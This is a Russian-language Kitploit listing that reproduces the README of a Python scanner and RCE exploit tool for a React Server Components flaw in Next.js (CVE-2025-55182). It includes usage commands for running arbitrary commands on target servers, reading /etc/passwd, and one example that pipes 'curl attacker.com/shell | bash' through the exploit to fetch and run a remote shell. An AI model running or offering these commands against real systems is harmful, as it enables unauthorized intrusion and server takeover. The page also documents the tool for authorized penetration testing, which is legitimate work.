Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-55182 — Безопасный сканер на Python для обнаружения и эксплуатации уязвимостей **React Server Components (RSC)** в приложениях Next.js. Этот инструмент выполняет пассивное обнаружение, активное снятие отпечатков и тестирование на эксплуатацию RCE. | Kitploit
Инструменты/GitHubGitHub/mahaveer-choudhary/cve-2025-55182
Сканеры уязвимостейАнализ КодаЭксплуатацияЭксплуатация веб-приложенийВеб-безопасностьТестирование на Проникновение
GitHubmahaveer-choudhary/cve-2025-55182

CVE-2025-55182

Безопасный сканер на Python для обнаружения и эксплуатации уязвимостей **React Server Components (RSC)** в приложениях Next.js. Этот инструмент выполняет пассивное обнаружение, активное снятие отпечатков и тестирование на эксплуатацию RCE.

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий
18 месяцев назадЕщё не проверено

RSC Detector - Сканер уязвимостей React Server Components

Безопасностный сканер на Python для обнаружения и эксплуатации уязвимостей React Server Components (RSC) в приложениях Next.js. Инструмент выполняет пассивное обнаружение, активное снятие отпечатков и тестирование эксплуатации RCE.

⚠️ ПРЕДУПРЕЖДЕНИЕ: Этот инструмент предназначен только для авторизованного тестирования безопасности. Несанкционированный доступ к компьютерным системам незаконен. Всегда получайте письменное разрешение перед тестированием.


Возможности

✅ Пассивное обнаружение — анализирует HTML, заголовки и структуру страницы на наличие индикаторов RSC
✅ Активное снятие отпечатков — отправляет RSC-специфичные заголовки для обнаружения ответов сервера
✅ Анализ HTTP-заголовков — выявляет заголовки, связанные с Next.js и RSC
✅ Эксплуатация RCE — выполняет команды на уязвимых серверах (если эксплойт возможен)
✅ Цветной вывод в терминал — улучшенная визуальная обратная связь для лучшей читаемости
✅ Интерактивный режим — выполнение нескольких команд в режиме эксплуатации
✅ Надёжное декодирование — обработка gzip-сжатых и бинарных полезных нагрузок


Установка

Предварительные требования

  • Python 3.8+
  • pip (менеджер пакетов Python)

Установка

  1. Клонируйте репозиторий

    root@kitploit:~
    git clone https://github.com/mahaveer-choudhary/CVE-2025-55182.git
    cd CVE-2025-55182
    
  2. Установите зависимости

    root@kitploit:~
    pip install -r requirements.txt
    

    Требуемые пакеты:

    • requests>=2.28.0 — библиотека HTTP-клиента
    • urllib3>=1.26.0 — расширенные утилиты HTTP
    • colorama>=0.4.6 — цвета терминала (совместимо с Windows)
    • beautifulsoup4 — парсинг HTML

Использование

Базовое обнаружение (без эксплуатации)

root@kitploit:~
python rsc_detector.py https://example.com

Полное сканирование с эксплуатацией

root@kitploit:~
python rsc_detector.py https://example.com --exploit

Выполнение определённой команды

root@kitploit:~
python rsc_detector.py https://example.com --exploit --cmd "whoami"

Интерактивный режим эксплуатации

root@kitploit:~
python rsc_detector.py https://example.com --exploit

Затем вводите команды в приглашении (введите quit для выхода).


Параметры командной строки

ОпцияОписание
<URL>URL цели (обязательно). Автоматически добавляется https://, если отсутствует
--exploit

Примеры

Обнаружение уязвимости RSC:

root@kitploit:~
python rsc_detector.py https://target.com

Эксплуатация и выполнение команды id:

root@kitploit:~
python rsc_detector.py https://target.com --exploit --cmd "id"

Эксплуатация и выполнение cat /etc/passwd:

root@kitploit:~
python rsc_detector.py https://target.com --exploit --cmd "cat /etc/passwd"

Интерактивный режим (несколько команд):

root@kitploit:~
python rsc_detector.py https://target.com --exploit

Как это работает

1. Пассивное сканирование

  • Проверка наличия маркера window.__next_f (маршрутизатор приложений Next.js)
  • Обнаружение Content-Type text/x-component
  • Поиск маркеров протокола React Flight
  • Анализ __NEXT_DATA__ и импортов Next.js

2. Анализ заголовков

  • Проверка заголовков Server, Vary и X-Nextjs-Cache
  • Выявление осведомлённости RSC в HTTP-заголовках

3. Активное снятие отпечатков

  • Отправка запросов с заголовком RSC: 1
  • Анализ ответа сервера на RSC-специфичные заголовки
  • Обнаружение структуры протокола React Flight

4. Эксплуатация RCE

  • Формирование вредоносной полезной нагрузки JSON, использующей сериализацию React Server Component
  • Отправка multipart/form-data для запуска выполнения кода на стороне сервера
  • Декодирование вывода команды в кодировке base64
  • Поддержка gzip-сжатых ответов

Вывод и результаты

Результаты обнаружения

root@kitploit:~
[*] Запуск сканирования RSC Detection на: https://example.com
====================================================================

[1] Выполнение пассивного сканирования...
    Статус: ОБНАРУЖЕНО
    Оценка: 80/100
    - Найдено: window.__next_f (App Router)

[2] Анализ заголовков...
    - Заголовок Vary включает RSC: ...

[3] Выполнение активного снятия отпечатков...
    Статус: ОБНАРУЖЕНО
    - Content-Type ответа стал text/x-component
    - Заголовок Vary содержит 'RSC'

====================================================================

[ИТОГОВЫЙ РЕЗУЛЬТАТ] УЯЗВИМО
[!] Это приложение, по-видимому, уязвимо для атак на основе RSC!
    Рекомендуется: возможна эксплуатация RCE

Вывод эксплуатации

root@kitploit:~
[*] Выполнение команды: whoami
[+] Команда выполнена успешно!
[ВЫВОД]
root

Детали уязвимости

CVE-2025-55182 использует:

  • Ошибки сериализации React Server Component (RSC)
  • Уязвимости десериализации Next.js Server Action
  • Загрязнение прототипа объекта через вредоносные полезные нагрузки
  • Внедрение команд через child_process.execSync()

Вектор атаки

  • Приложения Next.js, использующие App Router
  • Серверные компоненты с вводимыми пользователем данными
  • Приложения с включённым RSC, но без надлежащей проверки

Юридические и этические рекомендации

⚠️ Важно

Этот инструмент СТРОГО ТОЛЬКО ДЛЯ АВТОРИЗОВАННОГО ТЕСТИРОВАНИЯ БЕЗОПАСНОСТИ:

  1. ✅ ДЕЛАЙТЕ: Используйте только на системах, которыми владеете или на тестирование которых получили письменное разрешение
  2. ✅ ДЕЛАЙТЕ: Сообщайте об уязвимостях ответственному лицу
  3. ✅ ДЕЛАЙТЕ: Следуйте правилам ответственного раскрытия информации
  4. ❌ НЕ ДЕЛАЙТЕ: Не используйте против систем без авторизации
  5. ❌ НЕ ДЕЛАЙТЕ: Не используйте в злонамеренных целях
  6. ❌ НЕ ДЕЛАЙТЕ: Не храните и не выполняйте конфиденциальные данные

Несанкционированный доступ к компьютеру незаконен согласно:

  • Закону о компьютерном мошенничестве и злоупотреблениях (CFAA) — США
  • Закону о неправомерном использовании компьютеров 1990 г. — Великобритания
  • Аналогичным законам в большинстве стран

Ответственное раскрытие информации

Если вы обнаружите уязвимость с помощью этого инструмента:

  1. НЕ РАЗГЛАШАЙТЕ публично, пока поставщик не выпустит исправление
  2. СВЯЖИТЕСЬ с командой безопасности поставщика напрямую
  3. ДАЙТЕ 90 дней на разработку исправления
  4. СОГЛАСУЙТЕ с поставщиком время раскрытия
  5. УКАЖИТЕ себя в рекомендациях после раскрытия

Устранение неполадок

Ошибки SSL-сертификата

Инструмент по умолчанию игнорирует проверку SSL. Чтобы включить проверку:

root@kitploit:~
detector = RSCDetector(url, verify_ssl=True)

Ошибки декодирования Base64

Инструмент автоматически:

  • Добавляет отступы к некорректным строкам base64
  • Обнаруживает и распаковывает gzip-полезные нагрузки
  • Использует запасной вариант с символами замены UTF-8 для бинарных данных

Отсутствие ключа "digest" в ответе

  • Цель может не быть уязвимой
  • Сервер может фильтровать полезную нагрузку эксплойта
  • Попробуйте ручное тестирование или другие конечные точки

Проблемы с тайм-аутом

Увеличьте тайм-аут в коде:

root@kitploit:~
response = self.session.get(self.url, timeout=30)  # 30 секунд

Структура проекта

root@kitploit:~
CVE-2025-55182/
├── README.md                # Этот файл
├── requirements.txt         # Зависимости Python
├── rsc_detector.py         # Основной сканер и движок эксплойта
├── rsc_cli.py              # Утилиты CLI (если есть)
├── script.py               # Дополнительные скрипты (если есть)
├── COLOR_GUIDE.md          # Документация цветного вывода
└── .gitignore              # Правила игнорирования Git

Зависимости

root@kitploit:~
requests>=2.28.0         # HTTP-запросы
urllib3>=1.26.0          # Расширенный HTTP
beautifulsoup4>=4.11.0   # Парсинг HTML
colorama>=0.4.6          # Цвета терминала (Windows)

Установить всё сразу:

root@kitploit:~
pip install -r requirements.txt

Советы по производительности

  • Ускорение обнаружения: Пропустите флаг --exploit, если нужно только сканирование
  • Пакетное тестирование: Создайте скрипт для сканирования нескольких URL
  • Сетевой тайм-аут: Отрегулируйте значения тайм-аута для медленных сетей
  • Обход SSL: Проверка отключена по умолчанию для гибкости

Расширенное использование

Выполнение произвольной команды

root@kitploit:~
python rsc_detector.py https://target.com --exploit --cmd "curl attacker.com/shell | bash"

Перенаправление вывода

root@kitploit:~
python rsc_detector.py https://target.com > scan_results.txt 2>&1

Пакетное сканирование

root@kitploit:~
for url in https://site1.com https://site2.com; do
    python rsc_detector.py "$url"
done

Ограничения

  • ⚠️ Работает только с уязвимыми конфигурациями Next.js
  • ⚠️ Требуется включённый RSC в целевом приложении
  • ⚠️ Некоторые серверы могут фильтровать или блокировать полезные нагрузки эксплойта
  • ⚠️ Бинарный вывод может некорректно отображаться в терминале
  • ⚠️ Выполнение команд зависит от разрешений сервера

Вклад

Нашли ошибку или есть предложение по улучшению? Вклад приветствуется!

  1. Сделайте форк репозитория
  2. Создайте ветку для функции (git checkout -b feature/improvement)
  3. Зафиксируйте изменения (git commit -am 'Add feature')
  4. Отправьте в ветку (git push origin feature/improvement)
  5. Отправьте запрос на слияние (Pull Request)

Отказ от ответственности

root@kitploit:~
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND.
THE AUTHORS ASSUME NO LIABILITY FOR MISUSE OR UNAUTHORIZED ACCESS.
USE AT YOUR OWN RISK AND ONLY WITH PROPER AUTHORIZATION.

Лицензия

Этот проект предоставляется только для образовательных и авторизованных целей тестирования безопасности.


Ссылки

  • Документация React Server Components
  • Маршрутизатор приложений Next.js
  • CVE-2025-55182 (когда станет доступна)
  • OWASP: Ошибки внедрения

Контакты и поддержка

  • Сообщить об уязвимостях: Используйте ответственное раскрытие
  • Вопросы безопасности: Не публикуйте публично; свяжитесь с мейнтейнерами напрямую
  • Запросы функций: Откройте issue на GitHub

Автор

Создано для исследований в области безопасности и авторизованного тестирования на проникновение.

Последнее обновление: 19 декабря 2025 г.


Журнал изменений

v1.0.0

  • ✅ Пассивное обнаружение RSC
  • ✅ Активное снятие отпечатков
  • ✅ Эксплуатация RCE
  • ✅ Цветной вывод в терминал
  • ✅ Интерактивный режим эксплуатации
  • ✅ Поддержка распаковки Gzip
  • ✅ Надёжное декодирование base64

Помните: С большой силой приходит большая ответственность. Используйте этот инструмент этично и законно.

Скачать инструмент
Включить эксплуатацию RCE после обнаружения
--cmd <команда>Выполнить определённую команду (используйте с --exploit)